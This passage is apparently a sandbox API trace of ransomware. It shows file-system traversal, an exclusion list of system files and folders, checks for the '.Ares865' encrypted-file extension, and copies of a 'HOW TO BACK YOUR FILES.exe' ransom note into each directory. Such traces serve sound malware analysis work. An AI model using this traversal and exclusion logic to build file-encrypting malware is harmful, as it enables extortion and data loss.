[0065.622] lstrcmpiW (lpString1="History", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.622] lstrcmpiW (lpString1="History", lpString2="aoldtz.exe") returned 1 [0065.622] lstrcmpiW (lpString1="History", lpString2=".") returned 1 [0065.622] lstrcmpiW (lpString1="History", lpString2="..") returned 1 [0065.622] lstrcmpiW (lpString1="History", lpString2="windows") returned -1 [0065.622] lstrcmpiW (lpString1="History", lpString2="bootmgr") returned 1 [0065.622] lstrcmpiW (lpString1="History", lpString2="temp") returned -1 [0065.623] lstrcmpiW (lpString1="History", lpString2="pagefile.sys") returned -1 [0065.623] lstrcmpiW (lpString1="History", lpString2="boot") returned 1 [0065.623] lstrcmpiW (lpString1="History", lpString2="ids.txt") returned -1 [0065.623] lstrcmpiW (lpString1="History", lpString2="ntuser.dat") returned -1 [0065.623] lstrcmpiW (lpString1="History", lpString2="perflogs") returned -1 [0065.623] lstrcmpiW (lpString1="History", lpString2="MSBuild") returned -1 [0065.623] lstrlenW (lpString="History") returned 7 [0065.623] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data") returned 70 [0065.623] lstrcpyW (in: lpString1=0x2cce46c, lpString2="History" | out: lpString1="History") returned="History" [0065.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0065.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f0380 [0065.623] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0065.623] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49f3b220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.623] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.623] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x66b2700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66b2700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xbdaf0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db.Ares865", cAlternateFileName="ICONCA~1.ARE")) returned 1 [0065.623] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.623] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="aoldtz.exe") returned 1 [0065.623] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2=".") returned 1 [0065.623] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="..") returned 1 [0065.623] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="windows") returned -1 [0065.625] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="bootmgr") returned 1 [0065.625] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="temp") returned -1 [0065.625] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="pagefile.sys") returned -1 [0065.625] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="boot") returned 1 [0065.625] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="ids.txt") returned -1 [0065.625] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="ntuser.dat") returned -1 [0065.625] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="perflogs") returned -1 [0065.626] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="MSBuild") returned -1 [0065.626] lstrlenW (lpString="IconCache.db.Ares865") returned 20 [0065.626] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\History") returned 61 [0065.626] lstrcpyW (in: lpString1=0x2cce46c, lpString2="IconCache.db.Ares865" | out: lpString1="IconCache.db.Ares865") returned="IconCache.db.Ares865" [0065.626] lstrlenW (lpString="IconCache.db.Ares865") returned 20 [0065.626] lstrlenW (lpString="Ares865") returned 7 [0065.626] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0065.626] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2="aoldtz.exe") returned 1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2="temp") returned -1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2="ntuser.dat") returned -1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2="perflogs") returned -1 [0065.626] lstrcmpiW (lpString1="Microsoft", lpString2="MSBuild") returned -1 [0065.626] lstrlenW (lpString="Microsoft") returned 9 [0065.626] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\IconCache.db.Ares865") returned 74 [0065.626] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0065.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0065.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f0518 [0065.626] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7b70 [0065.626] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b34dcb8, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0065.626] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.626] lstrcmpiW (lpString1="Temp", lpString2="aoldtz.exe") returned 1 [0065.626] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0065.626] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0065.626] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0065.626] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0065.626] lstrcmpiW (lpString1="Temp", lpString2="temp") returned 0 [0065.627] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="aoldtz.exe") returned 1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="windows") returned -1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="bootmgr") returned 1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="temp") returned 1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="pagefile.sys") returned 1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="boot") returned 1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="ids.txt") returned 1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="ntuser.dat") returned 1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="perflogs") returned 1 [0065.627] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="MSBuild") returned 1 [0065.627] lstrlenW (lpString="Temporary Internet Files") returned 24 [0065.627] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft") returned 63 [0065.627] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Temporary Internet Files" | out: lpString1="Temporary Internet Files") returned="Temporary Internet Files" [0065.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0065.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9e) returned 0x2d7700 [0065.627] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7b90 [0065.627] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0065.627] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.627] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0065.627] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files" [0065.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0065.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0065.627] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files") returned 78 [0065.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files" [0065.627] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.627] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.628] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.628] GetLastError () returned 0x0 [0065.628] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.628] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.628] CloseHandle (hObject=0x12c) returned 1 [0065.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.628] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.628] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.629] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.629] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.629] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.629] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.629] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.629] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.629] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.629] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.629] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content.IE5", cAlternateFileName="")) returned 1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2="aoldtz.exe") returned 1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2=".") returned 1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2="..") returned 1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2="windows") returned -1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2="bootmgr") returned 1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2="temp") returned -1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2="pagefile.sys") returned -1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2="boot") returned 1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2="ids.txt") returned -1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2="ntuser.dat") returned -1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2="perflogs") returned -1 [0065.629] lstrcmpiW (lpString1="Content.IE5", lpString2="MSBuild") returned -1 [0065.629] lstrlenW (lpString="Content.IE5") returned 11 [0065.629] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\*") returned 80 [0065.629] lstrcpyW (in: lpString1=0x2cce49e, lpString2="Content.IE5" | out: lpString1="Content.IE5") returned="Content.IE5" [0065.629] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0065.629] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb6) returned 0x31efc8 [0065.629] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7b90 [0065.630] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0065.630] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0065.630] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0065.630] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5") returned 90 [0065.630] lstrcpyW (in: lpString1=0x2cce49e, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0065.630] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0065.630] lstrlenW (lpString="Ares865") returned 7 [0065.630] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0065.630] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a3658a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.630] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.630] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0065.630] lstrcmpiW (lpString1="Low", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.630] lstrcmpiW (lpString1="Low", lpString2="aoldtz.exe") returned 1 [0065.630] lstrcmpiW (lpString1="Low", lpString2=".") returned 1 [0065.630] lstrcmpiW (lpString1="Low", lpString2="..") returned 1 [0065.630] lstrcmpiW (lpString1="Low", lpString2="windows") returned -1 [0065.630] lstrcmpiW (lpString1="Low", lpString2="bootmgr") returned 1 [0065.630] lstrcmpiW (lpString1="Low", lpString2="temp") returned -1 [0065.630] lstrcmpiW (lpString1="Low", lpString2="pagefile.sys") returned -1 [0065.630] lstrcmpiW (lpString1="Low", lpString2="boot") returned 1 [0065.630] lstrcmpiW (lpString1="Low", lpString2="ids.txt") returned 1 [0065.630] lstrcmpiW (lpString1="Low", lpString2="ntuser.dat") returned -1 [0065.631] lstrcmpiW (lpString1="Low", lpString2="perflogs") returned -1 [0065.631] lstrcmpiW (lpString1="Low", lpString2="MSBuild") returned -1 [0065.631] lstrlenW (lpString="Low") returned 3 [0065.631] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\desktop.ini.Ares865") returned 98 [0065.631] lstrcpyW (in: lpString1=0x2cce49e, lpString2="Low" | out: lpString1="Low") returned="Low" [0065.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0065.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2e2710 [0065.631] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7cb0 [0065.631] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Virtualized", cAlternateFileName="VIRTUA~1")) returned 1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2="aoldtz.exe") returned 1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2=".") returned 1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2="..") returned 1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2="windows") returned -1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2="bootmgr") returned 1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2="temp") returned 1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2="pagefile.sys") returned 1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2="boot") returned 1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2="ids.txt") returned 1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2="ntuser.dat") returned 1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2="perflogs") returned 1 [0065.631] lstrcmpiW (lpString1="Virtualized", lpString2="MSBuild") returned 1 [0065.631] lstrlenW (lpString="Virtualized") returned 11 [0065.631] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low") returned 82 [0065.631] lstrcpyW (in: lpString1=0x2cce49e, lpString2="Virtualized" | out: lpString1="Virtualized") returned="Virtualized" [0065.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0065.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb6) returned 0x31f088 [0065.631] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7c30 [0065.631] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Virtualized", cAlternateFileName="VIRTUA~1")) returned 0 [0065.631] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.631] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0065.631] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized" [0065.631] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f088 | out: hHeap=0x2b0000) returned 1 [0065.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0065.632] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized") returned 90 [0065.632] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized" [0065.632] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.632] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.632] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" 